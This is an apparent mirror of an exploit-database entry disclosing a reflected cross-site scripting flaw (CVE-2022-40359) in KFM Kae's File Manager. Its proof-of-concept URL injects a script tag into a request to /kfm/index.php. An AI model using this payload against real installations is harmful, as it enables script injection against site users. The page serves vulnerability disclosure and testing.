Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090057

Below is a copy:

KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com'
# Vendor Homepage: https://code.google.com/archive/p/kfm/downloads
# Software Link: https://code.google.com/archive/p/kfm/downloads
# Version: ALL
# Tested on: Linux, Windows
# CVE : CVE-2022-40359

Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php.

Visit PoC URL in browser
https://{URL]/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.